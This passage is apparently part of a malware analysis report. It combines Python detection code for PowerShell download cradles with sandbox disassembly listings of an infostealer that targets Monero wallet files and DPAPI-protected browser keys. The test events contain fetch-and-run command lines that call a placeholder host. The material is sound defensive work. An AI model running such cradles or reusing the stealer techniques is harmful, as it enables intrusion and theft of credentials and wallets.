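# The sample hard-codes the 32-bit PowerShell path; a SysWOW64 PowerShell child
# of a 32-bit, non-interactive parent is worth a point on its own.
WOW64_PS = re.compile(r"\\syswow64\\windowspowershell\\", re.I)
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "windowsterminal.exe", "code.exe")
URL_RE = re.compile(r"downloadstring\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
ALERT_THRESHOLD = 6


@dataclass
class Verdict:
    pid: int
    image: str
    parent_image: str
    score: int = 0
    hits: List[str] = field(default_factory=list)
    url: Optional[str] = None

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def parse_event(line: str) -> dict:
    """'Key=Value|Key=Value' -> dict (constructed log layout, not Sysmon XML)."""
    out = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        out[key.strip()] = value.strip()
    return out


def score_event(ev: dict) -> Verdict:
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    v = Verdict(pid=int(ev.get("ProcessId", "0")), image=image,
                parent_image=ev.get("ParentImage", ""))
    if not image.lower().endswith("powershell.exe"):
        return v  # only PowerShell children are scored
    for name, rx, weight in CMD_INDICATORS:
        if rx.search(cmd):
            v.hits.append(name)
            v.score += weight
    if WOW64_PS.search(image):
        v.hits.append("wow64_ps")
        v.score += 1
    parent = v.parent_image.lower().rsplit("\\", 1)[-1]
    if parent and parent not in INTERACTIVE_PARENTS:
        v.hits.append("odd_parent")
        v.score += 1
    m = URL_RE.search(cmd)
    if m:
        v.url = m.group(1)  # the DownloadString() argument, for blocking
    return v


def scan(lines: List[str]) -> List[Verdict]:
    return [score_event(parse_event(line)) for line in lines]


# Constructed events (not from the report): the cradle from the strings above,
# a benign admin script, a non-PowerShell process, and a rewritten cradle.
SAMPLE_EVENTS = [
    "ProcessId=4120|Image=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Users\\user\\Desktop\\file.exe"
    "|CommandLine=\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -c "
    "\"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/loader.ps1')\"",
    "ProcessId=4121|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "ProcessId=4122|Image=C:\\Windows\\System32\\cmd.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|CommandLine=cmd.exe /c whoami",
    "ProcessId=4123|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"
    "|CommandLine=powershell.exe -NoP -W Hidden -C \"IEX (New-Object Net.WebClient).DownloadData('https://example.invalid/p')\"",
]

if __name__ == "__main__":
    for v in scan(SAMPLE_EVENTS):
        print(f"pid={v.pid} score={v.score} alert={v.alert} hits={v.hits} url={v.url}")
```

The threshold sits above what a single token can reach, so "-NoProfile" in an admin script does not alert on its own, while any two of iex, Net.WebClient and Download*( together do. In a real pipeline the parent check should also look at the parent's signer and location rather than only its name.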
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00869F41
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 6b05721617136f2e17329ff0a4c8dafee8c56c22f2ccbc1b898ce0615b0752db
                        • Instruction ID: bfaef2fd5b75d26926caf130eff3c251bc81cbcf6a3e88ef993d20ca943cc618
                        • Opcode Fuzzy Hash: 6b05721617136f2e17329ff0a4c8dafee8c56c22f2ccbc1b898ce0615b0752db
                        • Instruction Fuzzy Hash: 2E61FE71910248DBDB18EFA8CC96BED7775FF84344F008118E91AEB295DB74AA06CB53
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 0087696C
                        • sscanf.NTDLL ref: 00876999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008769B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008769C0
                        • ExitProcess.KERNEL32 ref: 008769DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: bb20791697e107cfbeced319085a0f5dd0b0c2329fc21c0c82424c2c09d27cbc
                        • Instruction ID: dacff15714cb8a18bb4d2886c1a7439c063d09581d8bc755f07c18836fd0dbbb
                        • Opcode Fuzzy Hash: bb20791697e107cfbeced319085a0f5dd0b0c2329fc21c0c82424c2c09d27cbc
                        • Instruction Fuzzy Hash: 1E212C71D00209ABCF44EFE4D845AEEB7B5FF4C300F00812AE01AE3254EB349605CB65
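The call sequence above (GetSystemTime, sscanf of a string, SystemTimeToFileTime on two SYSTEMTIME structures, ExitProcess) is the shape of a date gate: the current time and a parsed date are both converted to FILETIME so they can be compared as one 64-bit number, and the process exits on one side of the comparison. The following is an added model of that logic for this report, not the sample's code. The page does not show the sscanf format string or the comparison direction, so the model assumes a "%d-%d-%d" year-month-day string and that the process exits once the current time is past the configured date; adjust both if the disassembly says otherwise.

```python
"""
Model of the date gate in the function above (GetSystemTime / sscanf /
SystemTimeToFileTime x2 / ExitProcess).

Added example for this report, not the sample's code. Assumed: "%d-%d-%d"
format and exit when the current time is later than the parsed date.
"""
import re
from datetime import datetime, timezone
from typing import Optional, Tuple

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # FILETIME counts 100 ns intervals since 1601-01-01 UTC


def systemtime_to_filetime(year: int, month: int, day: int,
                           hour: int = 0, minute: int = 0, second: int = 0,
                           milliseconds: int = 0) -> int:
    """Same arithmetic as SystemTimeToFileTime, returned as one 64-bit integer
    (the two DWORDs of a FILETIME read as a single unsigned value)."""
    when = datetime(year, month, day, hour, minute, second,
                    milliseconds * 1000, tzinfo=timezone.utc)
    delta = when - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_dwords(ft: int) -> Tuple[int, int]:
    """Split a FILETIME into (dwLowDateTime, dwHighDateTime), the layout seen on
    the stack after SystemTimeToFileTime returns."""
    return ft & 0xFFFFFFFF, (ft >> 32) & 0xFFFFFFFF


def parse_gate_date(text: str) -> Optional[Tuple[int, int, int]]:
    """Emulates sscanf(text, "%d-%d-%d", &y, &m, &d) (assumed format).
    Returns None when fewer than three fields convert."""
    m = re.match(r"\s*(\d+)-(\d+)-(\d+)", text)
    return tuple(int(g) for g in m.groups()) if m else None


def gate_decision(now: Tuple[int, int, int], gate_date: str) -> str:
    """'exit' when ExitProcess would fire, 'run' otherwise.
    `now` is (year, month, day) in UTC, as GetSystemTime reports it."""
    parsed = parse_gate_date(gate_date)
    if parsed is None:
        # The page does not show what the sample does when sscanf fails.
        raise ValueError("gate date did not parse")
    current_ft = systemtime_to_filetime(*now)
    expiry_ft = systemtime_to_filetime(*parsed)
    return "exit" if current_ft > expiry_ft else "run"


if __name__ == "__main__":
    low, high = filetime_dwords(systemtime_to_filetime(1970, 1, 1))
    print(f"1970-01-01 as FILETIME: low=0x{low:08X} high=0x{high:08X}")
    print(gate_decision((2024, 10, 11), "2024-12-31"))
```

When reproducing the sample in a sandbox after its gate date, set the guest clock before the date rather than patching the jump, so the rest of the time-dependent behaviour stays intact; the dword split is handy for recognising the converted values in a memory dump.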
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0115C370,00000000,00020119,?), ref: 00877E5E
                        • RegQueryValueExA.ADVAPI32(?,0116E2B8,00000000,00000000,000000FF,000000FF), ref: 00877E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00877E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 573a3065febaf17a039201ae12f03caceb567e2a6c6ee67fd7fbbe4e60cf7912
                        • Instruction ID: a2fa64573baa5310219e99ee2aca3494f1fdc1c66c05cc95970bd465768accba
                        • Opcode Fuzzy Hash: 573a3065febaf17a039201ae12f03caceb567e2a6c6ee67fd7fbbe4e60cf7912
                        • Instruction Fuzzy Hash: CF116DB2A4420AABD700CFD4DC49FBBBBB8FB09B14F108119F615E7280D7785801CBA1
                        APIs
                        • StrStrA.SHLWAPI(0116E390,?,?,?,0087140C,?,0116E390,00000000), ref: 0087926C
                        • lstrcpyn.KERNEL32(00AAAB88,0116E390,0116E390,?,0087140C,?,0116E390), ref: 00879290
                        • lstrlen.KERNEL32(?,?,0087140C,?,0116E390), ref: 008792A7
                        • wsprintfA.USER32 ref: 008792C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: e1a48da4b66ad80110c71e10f1d4486861de063492aaf8b8db9cb39964bb5793
                        • Instruction ID: 90bdf3cee84a6be8f30760af0826dad5d23835e16de4561be2c02f47fd359e55
                        • Opcode Fuzzy Hash: e1a48da4b66ad80110c71e10f1d4486861de063492aaf8b8db9cb39964bb5793
                        • Instruction Fuzzy Hash: 4E01D375500208FFCB04DFE8C988EBE7BB9EB59354F108548F9098B285C731AE41DBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008612B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008612BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008612D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008612F5
                        • RegCloseKey.ADVAPI32(?), ref: 008612FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 66b968cda60b29888632f4d821048d9ceb261c5e6cf616a4139690534db4fa80
                        • Instruction ID: 648ae2122ad8b3433444dae70a6629424b85d6b21ccfc1864372f5009105522b
                        • Opcode Fuzzy Hash: 66b968cda60b29888632f4d821048d9ceb261c5e6cf616a4139690534db4fa80
                        • Instruction Fuzzy Hash: 4901FBB9A40209BBDB00DFE0DC49FAEB7B8EB58701F008159FA05D72C0D7759A01CB51
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00876663
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00876726
                        • ExitProcess.KERNEL32 ref: 00876755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: ae9c9ff25a43586dbe24265773a51bf80519a327b9845c74aa8facb19b7b0352
                        • Instruction ID: 03663292b24f6104b4005359d2bdda61d15c7e0560acfde53af68f7a035efcd5
                        • Opcode Fuzzy Hash: ae9c9ff25a43586dbe24265773a51bf80519a327b9845c74aa8facb19b7b0352
                        • Instruction Fuzzy Hash: B1314BB1800218ABDB58EB94CC85BDEBB78FF54300F408198F319A6195DF74AA49CF5B
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00880E28,00000000,?), ref: 0087882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00878836
                        • wsprintfA.USER32 ref: 00878850
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 9dd55df11d334b196099b7a9700170deca87ceecbd7ea8d21c519c755f5f6681
                        • Instruction ID: 75d788e0a227875c10bb92ad712f71758dc137337056036c4ec5ef0fe477c69b
                        • Opcode Fuzzy Hash: 9dd55df11d334b196099b7a9700170deca87ceecbd7ea8d21c519c755f5f6681
                        • Instruction Fuzzy Hash: DF21EDB1A44209ABDB04DFD4DD49FAEBBF8FB49B11F104119F605A72C0C7799901CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0087951E,00000000), ref: 00878D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00878D62
                        • wsprintfW.USER32 ref: 00878D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 740b410276e38939ea9a920d0f0d4d3788febb3df9c5308b7fa1d3f3b8c318d2
                        • Instruction ID: 9cf1d1e5de5af74724b6712f1a45a75fe1c10610e14f55af15cfb1f82377dbb4
                        • Opcode Fuzzy Hash: 740b410276e38939ea9a920d0f0d4d3788febb3df9c5308b7fa1d3f3b8c318d2
                        • Instruction Fuzzy Hash: 88E046B1A4020ABBC700DFD4DD0AA6977A8EB09702F000098FD0986280DB799A018B92
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0086A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0086A6BC
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0086A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 03642b20d8a9ac2fab6ea88a4f0e0cb3693c12b5c03627b583e3b47b26d13d49
                        • Instruction ID: 7e2dfa99d3d8ed8e6527201882c0724b9ed9b69c0196d13c34a6ed844ad134e4
                        • Opcode Fuzzy Hash: 03642b20d8a9ac2fab6ea88a4f0e0cb3693c12b5c03627b583e3b47b26d13d49
                        • Instruction Fuzzy Hash: 61E1A2728101189ADB09EBA8DC95EEE7378FF54300F50C169F52AF6095DF34AA49CB63
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086D481
                        • lstrlen.KERNEL32(00000000), ref: 0086D698
                        • lstrlen.KERNEL32(00000000), ref: 0086D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0086D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 72c967d1c4d7026020c0da8553a1be115e10f0b6400cd3349e0c1f6ce03735b6
                        • Instruction ID: ddcf464b7e94e2487854ffea3d97d9e0f648f955c433a6a85d743ff64841c17f
                        • Opcode Fuzzy Hash: 72c967d1c4d7026020c0da8553a1be115e10f0b6400cd3349e0c1f6ce03735b6
                        • Instruction Fuzzy Hash: EF91F4719101149ADB08FBA8DC96EEE7338FF54300F508169F52BE6095EF34AA49CB63
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086D801
                        • lstrlen.KERNEL32(00000000), ref: 0086D99F
                        • lstrlen.KERNEL32(00000000), ref: 0086D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0086DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: fa2d43aa0e42f26b63b2ca2cd1aaf925ae001835106e2add4a2830f3d20c7ebe
                        • Instruction ID: efb17ec0b34c6c921c0770876452452f8d29ce6eebf07960dbcc4963cf9886ea
                        • Opcode Fuzzy Hash: fa2d43aa0e42f26b63b2ca2cd1aaf925ae001835106e2add4a2830f3d20c7ebe
                        • Instruction Fuzzy Hash: F781E4719101149ACB08FBA8DD95EEE7378FF94300F508529F52AE6095EF34AA09CB63
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 1dd0b870ebbc502010063065f9ee83a00cff447b24414579a8b8bbbfaaaedfba
                        • Instruction ID: 4637a240a1da6decc0dd666ffff9c0c12490d834e731d6770182e783e7ed1813
                        • Opcode Fuzzy Hash: 1dd0b870ebbc502010063065f9ee83a00cff447b24414579a8b8bbbfaaaedfba
                        • Instruction Fuzzy Hash: 7C411F71D10109ABCB08EFE8D845AEEB774FB54704F00C428E52AA6295DB75AA09DF93
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00869D39
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869AEF
                          • Part of subcall function 00869AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00864EEE,00000000,?), ref: 00869B01
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869B2A
                          • Part of subcall function 00869AC0: LocalFree.KERNEL32(?,?,?,?,00864EEE,00000000,?), ref: 00869B3F
                          • Part of subcall function 00869B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00869B84
                          • Part of subcall function 00869B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00869BA3
                          • Part of subcall function 00869B60: LocalFree.KERNEL32(?), ref: 00869BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 30a44a4fa29e06cb243c5177575caf41ce3f13b7144dae583dcb33add2dd91f6
                        • Instruction ID: 99335bd2e40befd39f89e3a011d0988c338113f859db4bf36384d1749ff1f0e0
                        • Opcode Fuzzy Hash: 30a44a4fa29e06cb243c5177575caf41ce3f13b7144dae583dcb33add2dd91f6
                        • Instruction Fuzzy Hash: 163112B5D10109ABCF04DBE8DC85AEFB7BCFB48304F154529E955E7281EB349A05CBA1
                        APIs
                        • memset.MSVCRT ref: 008794EB
                          • Part of subcall function 00878D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0087951E,00000000), ref: 00878D5B
                          • Part of subcall function 00878D50: RtlAllocateHeap.NTDLL(00000000), ref: 00878D62
                          • Part of subcall function 00878D50: wsprintfW.USER32 ref: 00878D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 008795AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 008795C9
                        • CloseHandle.KERNEL32(00000000), ref: 008795D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: f2a19ed0cee327324880ebb23c273efe5fc279a004209b4a3358ca9f2b2b6eb5
                        • Instruction ID: c92f3870885de1d1d30f86b8d9a2a081db7e36521973627f65ef5df37a7a7288
                        • Opcode Fuzzy Hash: f2a19ed0cee327324880ebb23c273efe5fc279a004209b4a3358ca9f2b2b6eb5
                        • Instruction Fuzzy Hash: 2E310C71A0021C9FDB14DFD4CD89BEDB7B8FB59700F108459E50AAB188DB74AA89CB52
                        APIs
                        • CreateFileA.KERNEL32(00873AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00873AEE,?), ref: 008792FC
                        • GetFileSizeEx.KERNEL32(000000FF,00873AEE), ref: 00879319
                        • CloseHandle.KERNEL32(000000FF), ref: 00879327
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
